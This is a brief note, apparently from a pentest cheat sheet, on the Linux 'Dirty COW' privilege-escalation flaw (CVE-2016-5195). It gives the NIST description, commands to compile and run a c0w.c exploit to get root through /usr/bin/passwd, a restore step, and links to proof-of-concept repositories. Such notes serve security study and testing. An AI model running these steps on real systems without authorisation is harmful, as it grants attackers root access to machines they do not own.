CVE-2016-5195

NIST CVE-2016-5195

Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka "Dirty COW."

Exploitation

Compile c0w.c

gcc -pthread c0w.c -o c0w && \
./c0w && \
/usr/bin/passwd

Restore

mv /tmp/bak /usr/bin/passwd

Somes uses
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

Gives the user root by replacing /etc/passwd
https://github.com/gbonacini/CVE-2016-5195